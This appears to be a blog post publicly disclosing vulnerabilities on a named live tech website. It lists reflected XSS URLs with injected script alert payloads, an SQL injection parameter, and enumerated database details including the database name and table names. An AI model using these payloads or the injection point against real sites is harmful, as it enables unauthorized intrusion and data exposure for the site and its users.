Tech2 is a famous tech show broadcasted on the CNN-IBN network channels. Long time back, I had found XSS and SQL injection in their  site and had informed them. Again, I have got XSS and SQL injection bug in their site.

site: http://tech2.in.com

vulnerable xss links:

http://tech2.in.com/forums/index.php?sid=da6fea08c9b152d11604d9de6d1c67a6%22%3E%3Cscript%3Ealert%28%22LOXIans%22%29%3C/script%3E

http://tech2.in.com/seller_login_new.php?sourceurl=http://tech2.in.com/seller/seller_form_new.php%22%3E%3Cscript%3Ealert%28%22LOXIans%22%29%3C/script%3E

http://tech2.in.com/seller_login_new.php?sourceurl=http://tech2.in.com/seller/seller_detail.php?id=2475%22%3E%3Cscript%3Ealert%28%22LOXIans%22%29%3C/script%3E

Vulnerable SQLi link:

http://tech2.in.com/contest.php?contestid=832

Details:

Web Server: WEB18 SERVER SOFTWARE

DB Server:  MySQL >=5

DB: qtech

Table names:

F1Y08022009,activity,adlogger_adcheck_logs,adlogger_blocklogs,adlogger_channels,adlogger_logfiles,adlogger_quickstats,adlogger_users,admin_action_log,admin_action_log_nov2010,allsitestechbox,apcbanner,author,bannerautorefr

Pics:

 

Advertisement